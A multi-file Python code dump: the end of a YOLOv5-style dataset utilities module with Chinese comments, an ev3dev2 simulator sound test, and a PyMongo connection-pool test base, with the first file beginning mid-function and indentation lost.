img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
# 计算小图到大图上时所产生的偏移,用来计算mosaic增强后的标签框的位置
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
# 重新调整标签框的位置
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
# 调整标签框在图片内部
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
# copy_paste数据增强
img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
# 进行mosaic的时候将四张图片整合到一起之后shape为[2*img_size, 2*img_size]
# 对mosaic整合的图片进行随机旋转、平移、缩放、裁剪,透视变换,并resize为输入大小img_size
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
"""功能同上,只不过拼接9张图"""
# loads images in a 9-mosaic
global wp, w0, hp, c, h0, img9
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
for i, index in enumerate(indices):
# Load image 加载图片
img, _, (h, w) = load_image(self, index)
# place img in img9
# img在img9中的位置
'''
建立3*3的九宫格,以0为中心,逆时针循环设置位置,
具体如下:
8 1 2
7 0 3
6 5 4
'''
# 设置位置
if i == 0: # center 九宫格的中心
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top 正上方
c = s, s - h, s + w, s
elif i == 2: # top right 右上角
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right 正右方
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right 右下角
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom 正下方
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left 左下方
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left 正左方
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left 左上方
c = s - w, s + h0 - hp - h, s, s + h0 - hp
# 分别取得坐标位置的x,y
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augmen 图像增强
# 通过任意透视变换对图像进行剪切
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def create_folder(path='./new'):
"""创建文件夹"""
# Create folder
# 如果存在文件夹,则移除
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../datasets/coco128'):
"""通过将所有文件置于顶层来展平递归目录"""
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../datasets/coco128'): # from utils.datasets import *; extract_boxes()
"""将检测数据集转换为分类数据集,每个类有一个目录"""
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../datasets/coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
"""将数据集自动拆分为train/val/test拆分并保存path/Autosplit.*.txt文件"""
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sum([list(path.rglob(f"*.{img_ext}")) for img_ext in IMG_FORMATS], []) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
# 设置数据集划分txt文件列表
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path.parent / x).unlink(missing_ok=True) for x in txt] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write('./' + img.relative_to(path.parent).as_posix() + '\n') # add image to txt file
def verify_image_label(args):
"""验证一个图像标签对"""
# Verify one image-label pair
im_file, lb_file, prefix = args
# 漏掉的标签数量,找到的标签数量,空的标签数量,错误标签数量
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, corrupt
# 因为这个方法是循环调用的,累计上面的数据不在这里做,所以以下遇到相应的情况,只是设置为1
try:
# verify images
# PIL读取图片并验证
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
# 检查图片的长宽至少大于10个像素
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
# 检查图片后缀名是否在img_format中
assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'
# 检查jpg格式文件
if im.format.lower() in ('jpg', 'jpeg'):
with open(im_file, 'rb') as f:
f.seek(-2, 2)
assert f.read() == b'\xff\xd9', 'corrupted JPEG'
# verify labels
# 验证标签
segments = [] # instance segments
if os.path.isfile(lb_file):
nf = 1 # label found
with open(lb_file, 'r') as f:
# 读取label文件
l = [x.split() for x in f.read().strip().splitlines() if len(x)]
# 如果label某一列数大于8,则认为label是存的segment的polygon点
if any([len(x) > 8 for x in l]): # is segment
# 获取类别
classes = np.array([x[0] for x in l], dtype=np.float32)
# 获取segments, 因为segment标签可以是不同长度,所以这里segments是一个列表
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
# segments -> bbox, 得到新标签
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
# 判断标签是否有五列
assert l.shape[1] == 5, 'labels require 5 columns each'
# 判断标签是否全部>=0
assert (l >= 0).all(), 'negative labels'
# 判断标签坐标x y w h是否归一化
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
# 找出标签中重复的坐标
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
# l.shape[0] == 0则为空的标签,ne=1
ne = 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
# 不存在标签文件,则nm = 1
nm = 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
return im_file, l, shape, segments, nm, nf, ne, nc, ''
except Exception as e:
# 捕捉到错误则nc=1
nc = 1
msg = f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}'
return [None, None, None, None, nm, nf, ne, nc, msg]
def dataset_stats(path='coco128.yaml', autodownload=False, verbose=False, profile=False, hub=False):
"""返回数据集统计dict,其中包含每个类的每个分割的图像和实例计数"""
""" Return dataset statistics dictionary with images and instances counts per split per class
To run in parent directory: export PYTHONPATH="$PWD/yolov5"
Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
Usage2: from utils.datasets import *; dataset_stats('../datasets/coco128_with_yaml.zip')
Arguments
path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
autodownload: Attempt to download dataset if not found locally
verbose: Print stats dictionary
"""
def round_labels(labels):
# Update labels to integer class and 6 decimal place floats
return [[int(c), *[round(x, 4) for x in points]] for c, *points in labels]
def unzip(path):
# Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
if str(path).endswith('.zip'): # path is data.zip
assert Path(path).is_file(), f'Error unzipping {path}, file not found'
assert os.system(f'unzip -q {path} -d {path.parent}') == 0, f'Error unzipping {path}'
dir = path.with_suffix('') # dataset directory
return True, str(dir), next(dir.rglob('*.yaml')) # zipped, data_dir, yaml_path
else: # path is data.yaml
return False, None, path
def hub_ops(f, max_dim=1920):
# HUB ops for 1 image 'f'
im = Image.open(f)
r = max_dim / max(im.height, im.width) # ratio
if r < 1.0: # image too large
im = im.resize((int(im.width * r), int(im.height * r)))
im.save(im_dir / Path(f).name, quality=75) # save
zipped, data_dir, yaml_path = unzip(Path(path))
with open(check_file(yaml_path), encoding='ascii', errors='ignore') as f:
data = yaml.safe_load(f) # data dict
if zipped:
data['path'] = data_dir # TODO: should this be dir.resolve()?
check_dataset(data, autodownload) # download dataset if missing
hub_dir = Path(data['path'] + ('-hub' if hub else ''))
stats = {'nc': data['nc'], 'names': data['names']} # statistics dictionary
for split in 'train', 'val', 'test':
if data.get(split) is None:
stats[split] = None # i.e. no test set
continue
x = []
dataset = LoadImagesAndLabels(data[split]) # load dataset
for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics'):
x.append(np.bincount(label[:, 0].astype(int), minlength=data['nc']))
x = np.array(x) # shape(128x80)
stats[split] = {'instance_stats': {'total': int(x.sum()), 'per_class': x.sum(0).tolist()},
'image_stats': {'total': dataset.n, 'unlabelled': int(np.all(x == 0, 1).sum()),
'per_class': (x > 0).sum(0).tolist()},
'labels': [{str(Path(k).name): round_labels(v.tolist())} for k, v in
zip(dataset.img_files, dataset.labels)]}
if hub:
im_dir = hub_dir / 'images'
im_dir.mkdir(parents=True, exist_ok=True)
for _ in tqdm(ThreadPool(NUM_THREADS).imap(hub_ops, dataset.img_files), total=dataset.n, desc='HUB Ops'):
pass
# Profile
stats_path = hub_dir / 'stats.json'
if profile:
for _ in range(1):
file = stats_path.with_suffix('.npy')
t1 = time.time()
np.save(file, stats)
t2 = time.time()
x = np.load(file, allow_pickle=True)
print(f'stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
file = stats_path.with_suffix('.json')
t1 = time.time()
with open(file, 'w') as f:
json.dump(stats, f) # save stats *.json
t2 = time.time()
with open(file, 'r') as f:
x = json.load(f) # load hyps dict
print(f'stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
# Save, print and return
if hub:
print(f'Saving {stats_path.resolve()}...')
with open(stats_path, 'w') as f:
json.dump(stats, f) # save stats.json
if verbose:
print(json.dumps(stats, indent=2, sort_keys=False))
return stats
|
sound_integration_test.py
|
import os
import sys
import threading
import unittest
from multiprocessing import Process
from time import sleep
import ev3dev2simulator.config.config as config
from unittest.mock import patch, MagicMock
from ev3dev2.sound import Sound
from ev3dev2.motor import MoveTank, OUTPUT_A, OUTPUT_D, SpeedPercent
from ev3dev2simulator import __main__
class TestConfig(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
sim = Process(target=__main__.main, daemon=True)
sim.start()
sleep(4)
def test_beep(self):
print('Should beep 4 times, waits before driving')
flip = 1
s = Sound()
tank_drive = MoveTank(OUTPUT_A, OUTPUT_D)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.beep()
sleep(1)
print('Should beep 4 times, sound plays during driving')
s = Sound()
tank_drive = MoveTank(OUTPUT_A, OUTPUT_D)
flip = 1
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.beep(play_type=Sound.PLAY_NO_WAIT_FOR_COMPLETE)
sleep(3)
def test_speak(self):
flip = 1
s = Sound()
tank_drive = MoveTank(OUTPUT_A, OUTPUT_D)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.speak("tests tests tests tests")
sleep(3)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.speak("tests tests tests tests", play_type=Sound.PLAY_NO_WAIT_FOR_COMPLETE)
sleep(3)
def test_play_tone(self):
flip = 1
s = Sound()
tank_drive = MoveTank(OUTPUT_A, OUTPUT_D)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.play_tone(500, duration=2, volume=50, play_type=1)
sleep(3)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.play_tone(500, duration=2, volume=50, play_type=0)
sleep(3)
def test_tone(self):
flip = 1
s = Sound()
tank_drive = MoveTank(OUTPUT_A, OUTPUT_D)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.tone([
(392, 350, 100), (492, 350), (292,), ()
])
sleep(3)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.tone([
(392, 350, 100), (492, 350), (292,), ()
], play_type=Sound.PLAY_NO_WAIT_FOR_COMPLETE)
sleep(3)
def test_play_note(self):
flip = 1
s = Sound()
tank_drive = MoveTank(OUTPUT_A, OUTPUT_D)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.play_note("C4", 0.5)
sleep(3)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.play_note("C4", 0.5, play_type=Sound.PLAY_NO_WAIT_FOR_COMPLETE)
sleep(3)
def skip_test_play_file(self):
flip = 1
s = Sound()
tank_drive = MoveTank(OUTPUT_A, OUTPUT_D)
for x in range(2):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.play_file('inputFiles/bark.wav')
sleep(3)
for x in range(4):
flip *= -1
tank_drive.on_for_seconds(SpeedPercent(30 * flip), SpeedPercent(30 * flip), 1, True, True)
s.play_file('inputFiles/bark.wav', play_type=Sound.PLAY_NO_WAIT_FOR_COMPLETE)
sleep(3)
def test_play_song(self):
s = Sound()
s.play_song((
('D4', 'e3'), # intro anacrouse
('D4', 'e3'),
('D4', 'e3'),
('G4', 'h'), # meas 1
('D5', 'h'),
('C5', 'e3'), # meas 2
('B4', 'e3'),
('A4', 'e3'),
('G5', 'h'),
('D5', 'q'),
('C5', 'e3'), # meas 3
('B4', 'e3'),
('A4', 'e3'),
('G5', 'h'),
('D5', 'q'),
('C5', 'e3'), # meas 4
['B4', 'e3'],
('C5', 'e3'),
('A4', 'h.'),
))
if __name__ == '__main__':
unittest.main()
|
test_pooling_base.py
|
# Copyright 2012 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base classes to test built-in connection-pooling with threads or greenlets.
"""
import gc
import random
import socket
import sys
import thread
import threading
import time
sys.path[0:0] = [""]
from nose.plugins.skip import SkipTest
import pymongo.pool
from pymongo.connection import Connection
from pymongo.pool import (
Pool, GreenletPool, NO_REQUEST, NO_SOCKET_YET, SocketInfo)
from pymongo.errors import ConfigurationError
from test import version
from test.test_connection import get_connection, host, port
from test.utils import delay, is_mongos
N = 50
DB = "pymongo-pooling-tests"
if sys.version_info[0] >= 3:
from imp import reload
try:
import gevent
from gevent import Greenlet, monkey, hub
import gevent.coros, gevent.event
has_gevent = True
except ImportError:
has_gevent = False
def one(s):
"""Get one element of a set"""
return iter(s).next()
class MongoThread(object):
"""A thread, or a greenlet, that uses a Connection"""
def __init__(self, test_case):
self.use_greenlets = test_case.use_greenlets
self.connection = test_case.c
self.db = self.connection[DB]
self.ut = test_case
self.passed = False
def start(self):
if self.use_greenlets:
# A Gevent extended Greenlet
self.thread = Greenlet(self.run)
else:
self.thread = threading.Thread(target=self.run)
self.thread.setDaemon(True) # Don't hang whole test if thread hangs
self.thread.start()
def join(self):
self.thread.join(300)
if self.use_greenlets:
assert self.thread.dead, "Greenlet timeout"
else:
assert not self.thread.isAlive(), "Thread timeout"
self.thread = None
def run(self):
self.run_mongo_thread()
# No exceptions thrown
self.passed = True
def run_mongo_thread(self):
raise NotImplementedError()
class SaveAndFind(MongoThread):
def run_mongo_thread(self):
for _ in xrange(N):
rand = random.randint(0, N)
_id = self.db.sf.save({"x": rand}, safe=True)
self.ut.assertEqual(rand, self.db.sf.find_one(_id)["x"])
class Unique(MongoThread):
def run_mongo_thread(self):
for _ in xrange(N):
self.connection.start_request()
self.db.unique.insert({})
self.ut.assertEqual(None, self.db.error())
self.connection.end_request()
class NonUnique(MongoThread):
def run_mongo_thread(self):
for _ in xrange(N):
self.connection.start_request()
self.db.unique.insert({"_id": "jesse"})
self.ut.assertNotEqual(None, self.db.error())
self.connection.end_request()
class Disconnect(MongoThread):
def run_mongo_thread(self):
for _ in xrange(N):
self.connection.disconnect()
class NoRequest(MongoThread):
def run_mongo_thread(self):
self.connection.start_request()
errors = 0
for _ in xrange(N):
self.db.unique.insert({"_id": "jesse"})
if not self.db.error():
errors += 1
self.connection.end_request()
self.ut.assertEqual(0, errors)
def run_cases(ut, cases):
threads = []
nruns = 10
if (
ut.use_greenlets and sys.platform == 'darwin'
and gevent.version_info[0] < 1
):
# Gevent 0.13.6 bug on Mac, Greenlet.join() hangs if more than
# about 35 Greenlets share a Connection. Apparently fixed in
# recent Gevent development.
nruns = 5
for case in cases:
for i in range(nruns):
t = case(ut)
t.start()
threads.append(t)
for t in threads:
t.join()
for t in threads:
assert t.passed, "%s.run_mongo_thread() threw an exception" % repr(t)
class OneOp(MongoThread):
def __init__(self, ut):
super(OneOp, self).__init__(ut)
def run_mongo_thread(self):
pool = self.connection._Connection__pool
assert len(pool.sockets) == 1, "Expected 1 socket, found %d" % (
len(pool.sockets)
)
sock_info = one(pool.sockets)
self.connection.start_request()
# start_request() hasn't yet moved the socket from the general pool into
# the request
assert len(pool.sockets) == 1
assert one(pool.sockets) == sock_info
self.connection[DB].test.find_one()
# find_one() causes the socket to be used in the request, so now it's
# bound to this thread
assert len(pool.sockets) == 0
assert pool._get_request_state() == sock_info
self.connection.end_request()
# The socket is back in the pool
assert len(pool.sockets) == 1
assert one(pool.sockets) == sock_info
class CreateAndReleaseSocket(MongoThread):
class Rendezvous(object):
def __init__(self, nthreads, use_greenlets):
self.nthreads = nthreads
self.nthreads_run = 0
if use_greenlets:
self.lock = gevent.coros.RLock()
self.ready = gevent.event.Event()
else:
self.lock = threading.Lock()
self.ready = threading.Event()
def __init__(self, ut, connection, start_request, end_request, rendevous):
super(CreateAndReleaseSocket, self).__init__(ut)
self.connection = connection
self.start_request = start_request
self.end_request = end_request
self.rendevous = rendevous
def run_mongo_thread(self):
# Do an operation that requires a socket.
# test_max_pool_size uses this to spin up lots of threads requiring
# lots of simultaneous connections, to ensure that Pool obeys its
# max_size configuration and closes extra sockets as they're returned.
for i in range(self.start_request):
self.connection.start_request()
# Use a socket
self.connection[DB].test.find_one()
# Don't finish until all threads reach this point
r = self.rendevous
r.lock.acquire()
r.nthreads_run += 1
if r.nthreads_run == r.nthreads:
# Everyone's here, let them finish
r.ready.set()
r.lock.release()
else:
r.lock.release()
r.ready.wait(2) # Wait two seconds
assert r.ready.isSet(), "Rendezvous timed out"
for i in range(self.end_request):
self.connection.end_request()
class _TestPoolingBase(object):
"""Base class for all connection-pool tests. Doesn't inherit from
unittest.TestCase, and its name is prefixed with "_" to avoid being
run by nose. Real tests double-inherit from this base and from TestCase.
"""
use_greenlets = False
def setUp(self):
if self.use_greenlets:
if not has_gevent:
raise SkipTest("Gevent not installed")
# Note we don't do patch_thread() or patch_all() - we're
# testing here that patch_thread() is unnecessary for
# the connection pool to work properly.
monkey.patch_socket()
self.c = self.get_connection(auto_start_request=False)
# reset the db
db = self.c[DB]
db.unique.drop()
db.test.drop()
db.unique.insert({"_id": "jesse"})
db.test.insert([{} for i in range(10)])
def tearDown(self):
self.c.close()
if self.use_greenlets:
# Undo patch
reload(socket)
def get_connection(self, *args, **kwargs):
opts = kwargs.copy()
opts['use_greenlets'] = self.use_greenlets
return get_connection(*args, **opts)
def get_pool(self, *args, **kwargs):
if self.use_greenlets:
klass = GreenletPool
else:
klass = Pool
return klass(*args, **kwargs)
def assert_no_request(self):
self.assertEqual(
NO_REQUEST, self.c._Connection__pool._get_request_state()
)
def assert_request_without_socket(self):
self.assertEqual(
NO_SOCKET_YET, self.c._Connection__pool._get_request_state()
)
def assert_request_with_socket(self):
self.assertTrue(isinstance(
self.c._Connection__pool._get_request_state(), SocketInfo
))
def assert_pool_size(self, pool_size):
self.assertEqual(
pool_size, len(self.c._Connection__pool.sockets)
)
class _TestPooling(_TestPoolingBase):
"""Basic pool tests, to be applied both to Pool and GreenletPool"""
def test_max_pool_size_validation(self):
self.assertRaises(
ConfigurationError, Connection, host=host, port=port,
max_pool_size=-1
)
self.assertRaises(
ConfigurationError, Connection, host=host, port=port,
max_pool_size='foo'
)
c = Connection(host=host, port=port, max_pool_size=100)
self.assertEqual(c.max_pool_size, 100)
def test_no_disconnect(self):
run_cases(self, [NoRequest, NonUnique, Unique, SaveAndFind])
def test_simple_disconnect(self):
# Connection just created, expect 1 free socket
self.assert_pool_size(1)
self.assert_no_request()
self.c.start_request()
self.assert_request_without_socket()
cursor = self.c[DB].stuff.find()
# Cursor hasn't actually caused a request yet, so there's still 1 free
# socket.
self.assert_pool_size(1)
self.assert_request_without_socket()
# Actually make a request to server, triggering a socket to be
# allocated to the request
list(cursor)
self.assert_pool_size(0)
self.assert_request_with_socket()
# Pool returns to its original state
self.c.end_request()
self.assert_no_request()
self.assert_pool_size(1)
self.c.disconnect()
self.assert_pool_size(0)
self.assert_no_request()
def test_disconnect(self):
run_cases(self, [SaveAndFind, Disconnect, Unique])
def test_independent_pools(self):
# Test for regression of very early PyMongo bug: separate pools shared
# state.
p = self.get_pool((host, port), 10, None, None, False)
self.c.start_request()
self.c.pymongo_test.test.find_one()
self.assertEqual(set(), p.sockets)
self.c.end_request()
self.assert_pool_size(1)
self.assertEqual(set(), p.sockets)
def test_dependent_pools(self):
self.assert_pool_size(1)
self.c.start_request()
self.assert_request_without_socket()
self.c.test.test.find_one()
self.assert_request_with_socket()
self.assert_pool_size(0)
self.c.end_request()
self.assert_pool_size(1)
t = OneOp(self)
t.start()
t.join()
self.assertTrue(t.passed, "OneOp.run() threw exception")
self.assert_pool_size(1)
self.c.test.test.find_one()
self.assert_pool_size(1)
def test_multiple_connections(self):
a = self.get_connection(auto_start_request=False)
b = self.get_connection(auto_start_request=False)
self.assertEqual(1, len(a._Connection__pool.sockets))
self.assertEqual(1, len(b._Connection__pool.sockets))
a.start_request()
a.test.test.find_one()
self.assertEqual(0, len(a._Connection__pool.sockets))
a.end_request()
self.assertEqual(1, len(a._Connection__pool.sockets))
self.assertEqual(1, len(b._Connection__pool.sockets))
a_sock = one(a._Connection__pool.sockets)
b.end_request()
self.assertEqual(1, len(a._Connection__pool.sockets))
self.assertEqual(1, len(b._Connection__pool.sockets))
b.start_request()
b.test.test.find_one()
self.assertEqual(1, len(a._Connection__pool.sockets))
self.assertEqual(0, len(b._Connection__pool.sockets))
b.end_request()
b_sock = one(b._Connection__pool.sockets)
b.test.test.find_one()
a.test.test.find_one()
self.assertEqual(b_sock,
b._Connection__pool.get_socket((b.host, b.port)))
self.assertEqual(a_sock,
a._Connection__pool.get_socket((a.host, a.port)))
a_sock.close()
b_sock.close()
def test_request(self):
# Check that Pool gives two different sockets in two calls to
# get_socket() -- doesn't automatically put us in a request any more
cx_pool = self.get_pool(
pair=(host,port),
max_size=10,
net_timeout=1000,
conn_timeout=1000,
use_ssl=False
)
sock0 = cx_pool.get_socket()
sock1 = cx_pool.get_socket()
self.assertNotEqual(sock0, sock1)
# Now in a request, we'll get the same socket both times
cx_pool.start_request()
sock2 = cx_pool.get_socket()
sock3 = cx_pool.get_socket()
self.assertEqual(sock2, sock3)
# Pool didn't keep reference to sock0 or sock1; sock2 and 3 are new
self.assertNotEqual(sock0, sock2)
self.assertNotEqual(sock1, sock2)
# Return the request sock to pool
cx_pool.end_request()
sock4 = cx_pool.get_socket()
sock5 = cx_pool.get_socket()
# Not in a request any more, we get different sockets
self.assertNotEqual(sock4, sock5)
# end_request() returned sock2 to pool
self.assertEqual(sock4, sock2)
for s in [sock0, sock1, sock2, sock3, sock4, sock5]:
s.close()
def test_reset_and_request(self):
# reset() is called after a fork, or after a socket error. Ensure that
# a new request is begun if a request was in progress when the reset()
# occurred, otherwise no request is begun.
p = self.get_pool((host, port), 10, None, None, False)
self.assertFalse(p.in_request())
p.start_request()
self.assertTrue(p.in_request())
p.reset()
self.assertTrue(p.in_request())
p.end_request()
self.assertFalse(p.in_request())
p.reset()
self.assertFalse(p.in_request())
def test_pool_reuses_open_socket(self):
# Test Pool's _check_closed() method doesn't close a healthy socket
cx_pool = self.get_pool((host,port), 10, None, None, False)
sock_info = cx_pool.get_socket()
cx_pool.maybe_return_socket(sock_info)
# trigger _check_closed, which only runs on sockets that haven't been
# used in a second
time.sleep(1.1)
new_sock_info = cx_pool.get_socket()
self.assertEqual(sock_info, new_sock_info)
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(1, len(cx_pool.sockets))
def test_pool_removes_dead_socket(self):
# Test that Pool removes dead socket and the socket doesn't return
# itself PYTHON-344
cx_pool = self.get_pool((host,port), 10, None, None, False)
sock_info = cx_pool.get_socket()
# Simulate a closed socket without telling the SocketInfo it's closed
sock_info.sock.close()
self.assertTrue(pymongo.pool._closed(sock_info.sock))
cx_pool.maybe_return_socket(sock_info)
time.sleep(1.1) # trigger _check_closed
new_sock_info = cx_pool.get_socket()
self.assertEqual(0, len(cx_pool.sockets))
self.assertNotEqual(sock_info, new_sock_info)
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(1, len(cx_pool.sockets))
def test_pool_removes_dead_request_socket_after_1_sec(self):
# Test that Pool keeps request going even if a socket dies in request
cx_pool = self.get_pool((host,port), 10, None, None, False)
cx_pool.start_request()
# Get the request socket
sock_info = cx_pool.get_socket()
self.assertEqual(0, len(cx_pool.sockets))
self.assertEqual(sock_info, cx_pool._get_request_state())
sock_info.sock.close()
cx_pool.maybe_return_socket(sock_info)
time.sleep(1.1) # trigger _check_closed
# Although the request socket died, we're still in a request with a
# new socket
new_sock_info = cx_pool.get_socket()
self.assertTrue(cx_pool.in_request())
self.assertNotEqual(sock_info, new_sock_info)
self.assertEqual(new_sock_info, cx_pool._get_request_state())
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(new_sock_info, cx_pool._get_request_state())
self.assertEqual(0, len(cx_pool.sockets))
cx_pool.end_request()
self.assertEqual(1, len(cx_pool.sockets))
def test_pool_removes_dead_request_socket(self):
# Test that Pool keeps request going even if a socket dies in request
cx_pool = self.get_pool((host,port), 10, None, None, False)
cx_pool.start_request()
# Get the request socket
sock_info = cx_pool.get_socket()
self.assertEqual(0, len(cx_pool.sockets))
